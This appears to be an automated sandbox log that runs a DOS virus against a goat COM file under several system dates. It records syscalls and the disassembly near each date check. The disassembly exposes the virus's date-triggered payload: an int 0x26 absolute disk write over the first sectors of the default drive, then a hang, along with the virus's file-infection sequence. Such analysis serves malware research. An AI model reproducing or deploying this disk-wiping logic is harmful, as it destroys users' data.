2018-12-25T12:01:50.475220169Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.481940642Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.648756016Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.650890045Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.65368537Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.654559391Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.656540134Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.658847719Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.661012389Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.663613862Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.666327377Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.668002948Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.66954132Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.671125353Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.674728822Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.681423741Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.682707322Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.685273905Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.686190507Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.695562842Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815897245Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817702475Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.822872626Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.824746984Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.950465328Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.957878975Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.710969556Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.712536273Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.716045724Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.716884281Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.718930286Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.72136517Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.72363497Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.725909602Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.728973731Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.730731087Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.732140379Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.734136002Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.739958986Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.7466083Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.758568063Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.761388938Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.762841777Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.766719226Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815898321Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817983466Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.822976221Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.825189415Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:52.003329777Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:52.010828721Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":2000,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.739438739Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.741455085Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.744134313Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.7449006Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.746713415Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.749540054Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.751856067Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.754449227Z 25 PC: 1300e | Get default drive
2018-12-25T12:01:51.815442129Z 9 PC: 13020 | Display string (String= 'e (COM). Size=0000014Dh/0000000333d bytes. ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.892692794Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.896886657Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.89937465Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.900144589Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.901995221Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.904120973Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.906429294Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.909275613Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.911781064Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.913764893Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.915828172Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.92081302Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.926148886Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.932154595Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.935348482Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.93956837Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.941409407Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.94558922Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.459074382Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.460902261Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.465034246Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.467365005Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:50.475141665Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.49599653Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:50.191720879Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:50.194247684Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:50.197803857Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:50.198793899Z 75 PC: 12fad | Execute program
2018-12-25T12:01:50.200241787Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:50.202490702Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:50.204897362Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:50.207109632Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:50.210260504Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:50.212456474Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:50.213986834Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:50.217051016Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:50.223195661Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:50.230094859Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.232998382Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:50.236081362Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.237662769Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.241553086Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815461967Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817104166Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.820496556Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.824093202Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.950392933Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.956788264Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":6,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:50.19979547Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:50.202539344Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:50.205143674Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:50.206051954Z 75 PC: 12fad | Execute program
2018-12-25T12:01:50.214378732Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:50.217371323Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:50.220361006Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:50.223246134Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:50.226137824Z 25 PC: 13037 | Get default drive
2018-12-25T12:01:50.459084826Z 9 PC: 13049 | Display string (String= ' ')